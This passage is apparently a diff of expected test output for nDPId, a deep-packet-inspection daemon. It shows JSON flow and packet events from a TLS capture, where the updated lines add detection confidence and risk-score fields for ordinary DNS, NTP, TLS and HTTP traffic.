CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}}
+01407{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":304,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168080569,"flow_last_seen":1626168080666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"ts_msec":1626168080666,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53919,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":310,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080732,"flow_last_seen":1626168080732,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1626168080732,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":56865,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1626168080732,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1626168080732,"pkt":"WNVuaKQA8BiYFWV8CABFAABMaD0AAEARB0vAqAF5Ef02+94hAHsAOPLHIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":310,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080732,"flow_last_seen":1626168080732,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1626168080732,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":56865,"dst_port":123,"l4_proto":"udp","ndpi": {"proto":"NTP.Apple","breed":"Safe","category":"System"},"ntp": {"request_code":0,"version":0}}
+00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":310,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080732,"flow_last_seen":1626168080732,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1626168080732,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":56865,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}}
 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1626168080762,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1626168080762,"pkt":"8BiYFWV8WNVuaKQACABFAABMWKVAADcR3+IR\/Tb7wKgBeQB73iEAOEmOJAED6wAAAAAAAAAOU0hNAOSX2YmMm6TtAAAAAAAAAADkl9mQ0KMdvOSX2ZDQo9j2"}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":312,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168081935,"flow_last_seen":1626168081935,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"ts_msec":1626168081935,"l3_proto":"ip4","src_ip":"130.211.33.145","dst_ip":"192.168.1.121","src_port":443,"dst_port":53432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1626168081935,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"ts_msec":1626168081935,"pkt":"8BiYFWV8WNVuaKQACABFAgBT\/jUAADoGG+iC0yGRwKgBeQG70LhXNR5OnF8A9oAYAQrx0QAAAQEICrTFhOw90eMiFwMDABoAAAAAAAAALjbyzjKtkrWGo0S+7wFfhufrwQ=="}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1626168081936,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1626168081936,"pkt":"WNVuaKQA8BiYFWV8CABFAAA0AABAAEAG1D7AqAF5gtMhkdC4AbucXwD2VzUebYAQCAChqQAAAQEICj3SCZ60xYTs"}
 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1626168081936,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"ts_msec":1626168081936,"pkt":"WNVuaKQA8BiYFWV8CABFAgBXAABAAEAG1BnAqAF5gtMhkdC4AbucXwD2VzUebYAYCABxCwAAAQEICj3SCZ60xYTsFwMDAB6jdVHReZkUes0n0uJUluEta6fWXjhtBJq5oBbOx1I="}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077441,"flow_last_seen":1626168077507,"flow_idle_time":180000,"flow_min_l4_payload_len":73,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":111,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65492,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"}}
-00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1626168076607,"flow_last_seen":1626168076607,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
-00619{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1626168076607,"flow_last_seen":1626168076607,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.2","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
-00720{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168077620,"flow_last_seen":1626168077673,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":2155,"flow_avg_l4_payload_len":195,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4":"Binary application transfer"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"}}
-00720{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168077660,"flow_last_seen":1626168077704,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":2392,"flow_avg_l4_payload_len":217,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4":"Binary application transfer"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077590,"flow_last_seen":1626168077604,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":141,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51364,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077413,"flow_last_seen":1626168077486,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":244,"flow_avg_l4_payload_len":122,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55567,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077604,"flow_last_seen":1626168077619,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":76,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55578,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168079361,"flow_last_seen":1626168079391,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":50288,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NTP.Apple","breed":"Safe","category":"System"}}
-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1626168076015,"flow_last_seen":1626168076015,"flow_idle_time":180000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"192.168.1.139","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077441,"flow_last_seen":1626168077507,"flow_idle_time":180000,"flow_min_l4_payload_len":73,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":111,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65492,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"}}
+00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1626168076607,"flow_last_seen":1626168076607,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1626168076607,"flow_last_seen":1626168076607,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.2","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00829{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168077620,"flow_last_seen":1626168077673,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":2155,"flow_avg_l4_payload_len":195,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"}}
+00829{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168077660,"flow_last_seen":1626168077704,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":2392,"flow_avg_l4_payload_len":217,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077590,"flow_last_seen":1626168077604,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":141,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51364,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077413,"flow_last_seen":1626168077486,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":244,"flow_avg_l4_payload_len":122,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55567,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077604,"flow_last_seen":1626168077619,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":76,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55578,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168079361,"flow_last_seen":1626168079391,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":50288,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}}
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1626168076015,"flow_last_seen":1626168076015,"flow_idle_time":180000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"192.168.1.139","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}}
 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168075993,"flow_last_seen":1626168077017,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077415,"flow_last_seen":1626168077439,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":53884,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1626168078653,"flow_last_seen":1626168079674,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":75,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077590,"flow_last_seen":1626168077622,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":118,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":58161,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168080732,"flow_last_seen":1626168080762,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":56865,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NTP.Apple","breed":"Safe","category":"System"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168080092,"flow_last_seen":1626168080122,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":65099,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NTP.Apple","breed":"Safe","category":"System"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1626168075664,"flow_last_seen":1626168076674,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":1180,"flow_avg_l4_payload_len":73,"midstream":0,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1626168078673,"flow_last_seen":1626168079052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":29308,"flow_avg_l4_payload_len":407,"midstream":1,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}}
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1626168078673,"flow_last_seen":1626168078826,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":17628,"flow_avg_l4_payload_len":326,"midstream":1,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}}
-00622{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168074745,"flow_last_seen":1626168074928,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.149.21.60","src_port":52746,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"}}
